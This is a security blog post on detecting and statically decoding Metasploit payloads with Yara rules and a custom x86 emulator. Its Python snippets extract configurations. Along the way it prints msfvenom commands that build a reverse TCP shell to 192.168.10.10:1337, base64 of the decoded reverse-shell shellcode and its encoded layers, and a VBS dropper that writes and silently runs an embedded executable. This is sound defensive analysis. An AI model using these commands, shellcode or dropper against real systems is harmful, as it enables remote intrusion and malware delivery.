Analyzing Metasploit Payloads

Introduction

Metasploit is a framework that aids penetration testers in their work. It has an enormous database of known exploits one can use to break into a system. Though the framework is meant to be used by ethical hackers, a lot of malware out there uses it for malicious purposes.

Attackers can make use of Metasploit in numerous ways, as its pre-built modules can automate a lot of the more complex aspects of malware. For example, you can use it to set up a server listening for incoming connections - Metasploit handles all the sessions that come in through those listeners, and the only thing left for the attacker to do is spread malware that initiates that connection. This isn’t hard to do either: the framework is capable of generating VBS scripts, executables, PowerShell scripts, DLLs, ELFs and more. Sending someone a Word document with an embedded VBS script and getting them to execute it is usually enough to receive a session, assuming their antivirus doesn’t pick up on it.

Detecting Metasploit

Detecting a Metasploit payload isn’t all that difficult. If you were to create a payload with msfvenom, say with the command msfvenom LHOST=192.168.10.10 LPORT=1337 --payload windows/shell/reverse_tcp --platform windows --arch x86, you’d get the same result every time. This allows you to write a simple Yara rule for this particular payload and extract its configuration. Unfortunately, this is not the only way to generate a payload. Metasploit has encoders which you can use to obfuscate your shellcode. They pack your payload into a self-decrypting blob of shellcode which turns back into the original one in memory.
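To make the "extract its configuration" step concrete, here is a minimal Python sketch. It relies on one observation: in the decoded reverse_tcp shellcode shown later in this post, the address and port sit in two consecutive push instructions (68 C0 A8 0A 0A, then 68 02 00 05 39). The function name and the regular expression are illustrative assumptions, not our production extractor, and other payload types may lay out their configuration differently.

```python
import re
import socket
import struct

# push imm32 (opcode 0x68) carrying the IPv4 address, followed by a second
# push imm32 whose first two bytes are AF_INET (02 00) and whose last two
# bytes are the port in network byte order.
# re.DOTALL matters: an address byte may be 0x0a, which "." would otherwise skip.
SOCKADDR_PUSHES = re.compile(rb"\x68(.{4})\x68\x02\x00(.{2})", re.DOTALL)


def extract_c2(shellcode: bytes):
    """Return 'host:port' if the two-push pattern is found, else None."""
    match = SOCKADDR_PUSHES.search(shellcode)
    if match is None:
        return None
    host = socket.inet_ntoa(match.group(1))
    (port,) = struct.unpack(">H", match.group(2))
    return f"{host}:{port}"


# Bytes taken from the decoded sample in this post:
# push 0x0a; push <ip>; push <port | AF_INET>; mov esi, esp
sample = bytes.fromhex("6a0a68c0a80a0a680200053989e6")
print(extract_c2(sample))  # 192.168.10.10:1337
```

A pattern this short can match unrelated bytes, so in practice it only makes sense to run it on a buffer that a Yara rule has already identified as this payload.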

Encoded payloads are harder to detect: no two generations are the same, as the decryption key is chosen at random. One of the most used encoders is Shikata Ga Nai, which uses a randomly generated key to XOR the instructions. The result is then also used to alter the key, making it harder to analyze statically. Detecting the encoders themselves is not hard, though: they all have a certain structure and certain CPU instructions which aren’t obfuscated. This means the encoders are also detectable with Yara rules. The real challenge after that is decoding the payload into a form that we can analyse further.
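The idea of a key that changes as decoding progresses can be sketched in a few lines of Python. This is a simplified model only: it assumes the feedback step adds each decoded dword to the key, and it leaves out everything else a real encoder stub does. The function names are hypothetical.

```python
import struct

MASK = 0xFFFFFFFF  # keep the key within 32 bits


def feedback_xor_encode(data: bytes, key: int) -> bytes:
    """XOR each little-endian dword with the key, then fold the plaintext into the key."""
    data += b"\x90" * (-len(data) % 4)  # pad to a dword boundary (NOP bytes, an assumption)
    out = bytearray()
    for (plain,) in struct.iter_unpack("<I", data):
        out += struct.pack("<I", plain ^ key)
        key = (key + plain) & MASK
    return bytes(out)


def feedback_xor_decode(data: bytes, key: int) -> bytes:
    """Inverse of feedback_xor_encode; len(data) must be a multiple of 4."""
    out = bytearray()
    for (cipher,) in struct.iter_unpack("<I", data):
        plain = cipher ^ key
        out += struct.pack("<I", plain)
        key = (key + plain) & MASK  # same update as the encoder, so keys stay in sync
    return bytes(out)


payload = b"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5"
first = feedback_xor_encode(payload, 0x11223344)
second = feedback_xor_encode(payload, 0x55667788)
print(first != second)  # different random keys give different bytes
print(feedback_xor_decode(first, 0x11223344)[: len(payload)] == payload)
```

Because every key after the first depends on the data decoded so far, a signature written against the encoded bytes of one sample will not match the next one.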

Our answer to this problem was building an emulator capable of running x86 instructions. This way we’re able to detect an encoder (which one it is doesn’t really matter) and run that through the emulator. Once we detect that it starts executing memory it has written to, we know that the decoder has finished running and we have the fully decoded payload ready.

The X86 Emulator

We’ve built a software implementation of the X86 instruction set, much like how an emulator works for old consoles or computers. The only thing standing out here is that we’ve built an X86 emulator to run on X86 hardware. The reason for that is security: we have potential malware that we want to analyze “statically”, so having a controlled environment is a must. We don’t want any of this code to actually run on the processor outside our sandbox environments.

So an X86 emulator, huh? That’s impressive, but can it run Crysis? Well, no. The X86 instruction set has over 1500 instructions (the actual number is a discussion on its own which I won’t get into), and it would be too much effort to implement all of them, especially when the encoders we try to emulate use a very small subset. So after implementing the first version of our emulator, we started generating payloads with different encoders and kept adding instructions to the emulator until we got back our expected payload.

I hinted at it above already, but why not just run it in the sandbox environment and be done with it? That’s because we also want to be able to analyze payloads statically. A piece of malware might drop a payload that for some unknown reason can’t be executed. Or it might sleep for so long before executing the payload that it exceeds the duration of our analyses. There are a lot of scenarios that leave us with the payload but without the execution, and that’s where our emulator kicks in. We first try to detect possible shellcode through Yara rules; if we find something, we emulate it. When the shellcode jumps into memory it has already written to, we assume it’s done with its decoding process and dump the part of the memory the decoder has written to. That piece of shellcode is then run through our analysis process again to see whether we need another round of emulation or can extract its configuration.
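The stop condition is easier to see in code. The Python sketch below uses a made-up three-opcode machine as a stand-in for x86, so the opcodes, the function names and the one-byte addressing are all assumptions for illustration. What it does share with the approach described above is the bookkeeping: record every address the code writes, stop as soon as the instruction pointer lands on one of them, and dump the written range.

```python
OP_HALT, OP_XOR, OP_JMP = 0x00, 0x01, 0x02  # toy opcodes, not x86


def emulate_until_written_code(memory: bytearray, entry: int = 0, max_steps: int = 10_000):
    """Run the toy machine; return the bytes it wrote once it tries to execute them."""
    written = set()
    pc = entry
    for _ in range(max_steps):
        if pc in written:
            # About to execute self-written memory: the decoder is done.
            return bytes(memory[min(written): max(written) + 1])
        opcode = memory[pc]
        if opcode == OP_XOR:  # XOR addr, key
            addr, key = memory[pc + 1], memory[pc + 2]
            memory[addr] ^= key
            written.add(addr)
            pc += 3
        elif opcode == OP_JMP:  # JMP addr
            pc = memory[pc + 1]
        elif opcode == OP_HALT:
            return None
        else:
            # Unknown instruction: the cue to go and implement it.
            raise NotImplementedError(f"opcode {opcode:#04x} at offset {pc}")
    return None  # step budget exhausted, e.g. an endless loop


def build_sample(payload: bytes, key: int) -> bytearray:
    """Toy 'encoder': a stub that XORs each payload byte in place, then jumps to it."""
    stub_len = 3 * len(payload) + 2
    stub = bytearray()
    for i in range(len(payload)):
        stub += bytes([OP_XOR, stub_len + i, key])
    stub += bytes([OP_JMP, stub_len])
    return stub + bytearray(b ^ key for b in payload)


sample = build_sample(b"\xfc\xe8\x82\x00", key=0x5A)
print(emulate_until_written_code(sample).hex())  # fce88200
```

The decoded bytes are never executed: the emulator stops one step before, which is what keeps the analysis static. The step limit is there for samples that never reach their payload.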

Extracting Metasploit Payloads

For example, if we had clean shellcode generated by the msfvenom command above, we’d be able to extract the following information:

[
  {
    "dumped_file": "revtcp86clean.bin",
    "config": {
      "family": "metasploit",
      "rule": "Metasploit",
      "c2": [
        "192.168.10.10:1337"
      ],
      "version": "windows/reverse_tcp"
    }
  }
]

However, if a payload is encoded by Shikata Ga Nai, for example by running the following command: msfvenom LHOST=192.168.10.10 LPORT=1337 --payload windows/shell/reverse_tcp --platform windows --arch x86 --encoder x86/shikata_ga_nai

we first need to run the sample through our emulator revealing the shellcode it’s supposed to execute:

[
  {
    "dumped_file": "revtcp86shik.pl",
    "config": {
      "family": "metasploit",
      "rule": "Metasploit",
      "version": "encoder/shikata_ga_nai",
      "shellcode": [
        "/OiCAAAAYInlMcBki1Awi1IMi1IUi3IoD7dKJjH/rDxhfAIsIMHPDQHH4vJSV4tSEItKPItMEXjjSAHRUYtZIAHTi0kY4zpJizSLAdYx/6zBzw0BxzjgdfYDffg7fSR15FiLWCQB02aLDEuLWBwB04sEiwHQiUQkJFtbYVlaUf/gX19aixLrjV1oMzIAAGh3czJfVGhMdyYHiej/0LiQAQAAKcRUUGgpgGsA/9VqCmjAqAoKaAIABTmJ5lBQUFBAUEBQaOoP3+D/1ZdqEFZXaJmldGH/1YXAdAr/Tgh17OhnAAAAagBqBFZXaALZyF//1YP4AH42izZqQGgAEAAAVmoAaFikU+X/1ZNTagBWU1doAtnIX//Vg/gAfShYaABAAABqAFBoCy8PMP/VV2h1bk1h/9VeXv8MJA+FcP///+mb////AcMpxnXBw7vwtaJWagBT/9U="
      ]
    }
  },
  {
    "dumped_file": "revtcp86shik.pl",
    "config": {
      "family": "metasploit",
      "rule": "Metasploit",
      "c2": [
        "192.168.10.10:1337"
      ],
      "version": "windows/reverse_tcp"
    }
  }
]

As you can see, our Yara rules first detect the Shikata Ga Nai encoder, and the payload is then automatically run through our emulator, revealing the shellcode. That shellcode is then run through the same process of detection to end up with a decoded and classified windows/reverse_tcp detection.

We’re also able to detect multiple layers of encoding. For example, we can run the same payload through shikata twice and then once more through the call4_dword_xor encoder.

[
  {
    "dumped_file": "revtcp86shikdouble-call4.bin",
    "config": {
      "family": "metasploit",
      "rule": "Metasploit",
      "version": "encoder/call4_dword_xor",
      "shellcode": [
        "29bZdCT0v+dZH1JYM8mxXYPo/DF4EwOfSv2nhqLYPBzJg5eVgGJTwsDiAD1f68X9WwiSDqKTfeOi8iHgRd1nNL1hafwnojWUBajNn7ywRhNdwB7m0GyGNSb3ASmp5EqYlOnCOBCijjtky6WYL8IPtdvs0mkul7IMHzQLpPRXZ2AMxFIB+tdFP+DKKafSnUUMozYFFPE3uVjXn2fpxR+OtEUr3mcXMxS6c1z0EBtY/6VYuqdOtJ7tNFvgotycb1j4By969GqH1DKHdSvQPdfM399pBFzBxnLRKlAP9m7AopDko8Rkm6t2FDdeVVaedTBdrjOPOvCbiqdALDtDT0NLFAg/K8PYc81jk9YLLFXzuXecV8RbtHs2bVCeLb8XuHOmDpvsNaYAsKvZkyZ1os/Jn1i0jLmfQQCjyr91noS1K0qZVWYQbrZUBKG6dZ+4q288GOM8Cb0FoAaIhBX7jSnlOPZQg/UUcvzjFaM6QSpj3uBExApMOLREN6t7IaOMcNMQlDshyLlevYQwazIA",
        "4vU=",
        "2c/ZdCT0WCvJsVa75yNoozFYGIPABANY88GdXxOHXqDj6NdF0iiDDkSZx0NoUoV3+xYCd0ycdLZNjUXZzcyZOewe7DgpQh1o4giwnYdFCRXbSAnKq2s4XaA1ml9lTpNHamtt81gHbNWR6MMYHhsdXJjEaJTbeWtjpqX+cAAtWF2x4j8WvU9LcKFOmArd2x/dVJ87+T17JVibKlq6RJL+sGjHcpvkJL8k9CLIV8btYvBqZa0H+2FO10PhsNizK3eM40NerWiUX3gEnvdDcJQNLIKpFJULT0a1W8AnZRuwz2+U7/CPf5ibfynwMxlwiqLmr/blbUUGq4UsFNzxzuQdlM6OGT6ZJiBn7ejbQm7uJBNGhBOB5vJbReYCCg/mauprtY/1oaoDYEqa8CMiIC4D7dsFF+oj2zBTSyMBY4tJgTPjhq68w2dllUvt6Ffq8iA5svPH4kWJqBWmbqFxp27Nh5S49P3beEMNbtzihJBy9Iw=",
        "4vU=",
        "/OiCAAAAYInlMcBki1Awi1IMi1IUi3IoD7dKJjH/rDxhfAIsIMHPDQHH4vJSV4tSEItKPItMEXjjSAHRUYtZIAHTi0kY4zpJizSLAdYx/6zBzw0BxzjgdfYDffg7fSR15FiLWCQB02aLDEuLWBwB04sEiwHQiUQkJFtbYVlaUf/gX19aixLrjV1oMzIAAGh3czJfVGhMdyYHiej/0LiQAQAAKcRUUGgpgGsA/9VqCmjAqAoKaAIABTmJ5lBQUFBAUEBQaOoP3+D/1ZdqEFZXaJmldGH/1YXAdAr/Tgh17OhnAAAAagBqBFZXaALZyF//1YP4AH42izZqQGgAEAAAVmoAaFikU+X/1ZNTagBWU1doAtnIX//Vg/gAfShYaABAAABqAFBoCy8PMP/VV2h1bk1h/9VeXv8MJA+FcP///+mb////AcMpxnXBw7vwtaJWagBT/9U="
      ]
    }
  },
  {
    "dumped_file": "revtcp86shikdouble-call4.bin",
    "config": {
      "family": "metasploit",
      "rule": "Metasploit",
      "c2": [
        "192.168.10.10:1337"
      ],
      "version": "windows/reverse_tcp"
    }
  }
]

As you see here we went through 3 iterations of emulation before reaching the eventual payload!
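The loop behind these reports can be sketched as follows. The detect and emulate arguments stand in for the Yara matching and the emulator. The toy versions below, including the "XOR!" marker and the rule that maps a leading FC E8 to windows/reverse_tcp, are invented for this example, and the result layout is a simplification of the JSON above.

```python
import base64
from typing import Callable, Optional

Detector = Callable[[bytes], Optional[str]]   # returns a rule name or None
Emulator = Callable[[bytes], Optional[bytes]]  # returns decoded bytes or None


def unwrap(blob: bytes, detect: Detector, emulate: Emulator, max_layers: int = 8) -> dict:
    """Detect, emulate and re-detect until a non-encoder rule matches."""
    result = {"encoders": [], "shellcode": [], "payload": None}
    for _ in range(max_layers):
        rule = detect(blob)
        if rule is None:
            break  # nothing we recognise
        if not rule.startswith("encoder/"):
            result["payload"] = rule  # reached the actual payload
            break
        decoded = emulate(blob)
        if decoded is None:
            break  # emulation did not produce a dump
        result["encoders"].append(rule)
        result["shellcode"].append(base64.b64encode(decoded).decode())
        blob = decoded
    return result


# Toy stand-ins so the sketch runs on its own (assumptions, not real rules).
def toy_encode(blob: bytes) -> bytes:
    return b"XOR!" + bytes(b ^ 0x5A for b in blob)


def toy_detect(blob: bytes) -> Optional[str]:
    if blob.startswith(b"XOR!"):
        return "encoder/toy_xor"
    if blob.startswith(b"\xfc\xe8"):
        return "windows/reverse_tcp"
    return None


def toy_emulate(blob: bytes) -> Optional[bytes]:
    return bytes(b ^ 0x5A for b in blob[4:])


triple = toy_encode(toy_encode(toy_encode(b"\xfc\xe8\x82\x00")))
report = unwrap(triple, toy_detect, toy_emulate)
print(report["encoders"], report["payload"])
```

The max_layers cap is a design choice for this sketch: it bounds the work spent on a sample that keeps producing new encoded layers.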

Analyzing Different Formats

So far we’ve only been looking at raw binary files. These are nice to test with, but you only ever see them used in the wild when they’re part of a buffer overflow. Since you can’t normally execute raw binary data, the Metasploit framework offers some wrappers around these payloads. The most straightforward wrapper is the .exe one. It creates a PE file with the payload embedded. This can then be executed by the operating system. More interesting is, for example, the VBS format.

When telling msfvenom we want a VBS script we’re presented with the following output:

Function HcGfeiml(IaptHACouEAi)
        iUPNjPkzUe = "<B64DECODE xmlns:dt="& Chr(34) & "urn:schemas-microsoft-com:datatypes" & Chr(34) & " " & _
                "dt:dt=" & Chr(34) & "bin.base64" & Chr(34) & ">" & _
                IaptHACouEAi & "</B64DECODE>"
        Set eczxPPClnXDCTA = CreateObject("MSXML2.DOMDocument.3.0")
        eczxPPClnXDCTA.LoadXML(iUPNjPkzUe)
        HcGfeiml = eczxPPClnXDCTA.selectsinglenode("B64DECODE").nodeTypedValue
        set eczxPPClnXDCTA = nothing
End Function

Function FZkulPlmtVbzDXN()
        aqbOmTnrjomNtbH = "TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAA....
        Dim VOBINYgrlwlXqiv
        Set VOBINYgrlwlXqiv = CreateObject("Scripting.FileSystemObject")
        Dim aWkaYXFosJ
        Dim ksOGlPgDlLhsQ
        Set aWkaYXFosJ = VOBINYgrlwlXqiv.GetSpecialFolder(2)
        ksOGlPgDlLhsQ = aWkaYXFosJ & "\" & VOBINYgrlwlXqiv.GetTempName()
        VOBINYgrlwlXqiv.CreateFolder(ksOGlPgDlLhsQ)
        NrOucMgKFeZaCbq = ksOGlPgDlLhsQ & "\" & "dyYwENHdDhEITk.exe"
        Dim XnQUJbgAv
        Set XnQUJbgAv = CreateObject("Wscript.Shell")
        eRvqQOddkXwnQ = HcGfeiml(aqbOmTnrjomNtbH)
        Set lCIOzbmX = CreateObject("ADODB.Stream")
        lCIOzbmX.Type = 1
        lCIOzbmX.Open
        lCIOzbmX.Write eRvqQOddkXwnQ
        lCIOzbmX.SaveToFile NrOucMgKFeZaCbq, 2
        XnQUJbgAv.run NrOucMgKFeZaCbq, 0, true
        VOBINYgrlwlXqiv.DeleteFile(NrOucMgKFeZaCbq)
        VOBINYgrlwlXqiv.DeleteFolder(ksOGlPgDlLhsQ)
End Function

FZkulPlmtVbzDXN

I’ve truncated the base64 string but as we can see from its starting characters, we’re dealing with a PE executable here. The lines after that are directions to dump and run that executable.
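Why the starting characters give it away: "TVqQ" is the base64 encoding of the bytes 4D 5A 90, and 4D 5A ("MZ") is the signature every PE file begins with. A quick Python check, with a hypothetical helper name:

```python
import base64


def starts_like_pe(b64_text: str) -> bool:
    """True if the first base64 group decodes to bytes starting with 'MZ'."""
    if len(b64_text) < 4:
        return False  # need one full 4-character group to decode 3 bytes
    return base64.b64decode(b64_text[:4])[:2] == b"MZ"


print(starts_like_pe("TVqQAAMAAAAEAAAA"))  # True
```

A matching signature only tells us the blob is worth parsing as a PE file; it says nothing yet about whether the rest of the file is valid.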

The code below creates a random temporary folder in which to store the payload.

Set VOBINYgrlwlXqiv = CreateObject("Scripting.FileSystemObject")
...
Set aWkaYXFosJ = VOBINYgrlwlXqiv.GetSpecialFolder(2)
ksOGlPgDlLhsQ = aWkaYXFosJ & "\" & VOBINYgrlwlXqiv.GetTempName()
VOBINYgrlwlXqiv.CreateFolder(ksOGlPgDlLhsQ)
NrOucMgKFeZaCbq = ksOGlPgDlLhsQ & "\" & "dyYwENHdDhEITk.exe"

After that, the top function is run to decode the base64 string: eRvqQOddkXwnQ = HcGfeiml(aqbOmTnrjomNtbH)

Once decoded, the script dumps the executable to disk and runs it.

Set lCIOzbmX = CreateObject("ADODB.Stream")
lCIOzbmX.Type = 1
lCIOzbmX.Open
lCIOzbmX.Write eRvqQOddkXwnQ
lCIOzbmX.SaveToFile NrOucMgKFeZaCbq, 2
XnQUJbgAv.run NrOucMgKFeZaCbq, 0, true

And to be nice and clean, the created file and directory are deleted afterwards:

VOBINYgrlwlXqiv.DeleteFile(NrOucMgKFeZaCbq)
VOBINYgrlwlXqiv.DeleteFolder(ksOGlPgDlLhsQ)

This is basically how every format is constructed: the shellcode is wrapped into an executable, and this executable is then embedded into a script (VBS, Python, Ruby, etc.) which dumps it to disk and executes it.
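Since the executable sits in the script as a plain string, it can be pulled out without ever running the script. The Python sketch below is one way to do that, under two assumptions: the base64 data is stored as a single quoted literal, as in the VBS sample above, and a minimum length of 16 characters (an arbitrary threshold) is enough to skip ordinary strings. The function name is hypothetical.

```python
import base64
import binascii
import re
from typing import List

# A quoted run of base64 characters, optionally padded with '='.
B64_LITERAL = re.compile(r'"([A-Za-z0-9+/]{16,}={0,2})"')


def carve_executables(script_text: str) -> List[bytes]:
    """Return every quoted base64 literal that decodes to data starting with 'MZ'."""
    found = []
    for match in B64_LITERAL.finditer(script_text):
        try:
            blob = base64.b64decode(match.group(1), validate=True)
        except binascii.Error:
            continue  # looked like base64 but was not (bad length or padding)
        if blob.startswith(b"MZ"):
            found.append(blob)
    return found


# Tiny synthetic script: an 'MZ' stub plus an unrelated string literal.
stub = b"MZ\x90\x00" + b"\x00" * 20
script = 'a = "' + base64.b64encode(stub).decode() + '"\n'
script += 'Set fso = CreateObject("Scripting.FileSystemObject")\n'
print(len(carve_executables(script)))  # 1
```

The carved executable can then go through the same analysis as any other file. Wrappers that split or transform the string would need their own handling.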

Conclusion

We’ve been putting a lot of time and effort into static analysis and the extraction of malware configurations. By understanding the way Metasploit encoders work we’ve been able to detect them, strip them of their encoding, and provide their configuration even if they weren’t able to run in a dynamic environment.
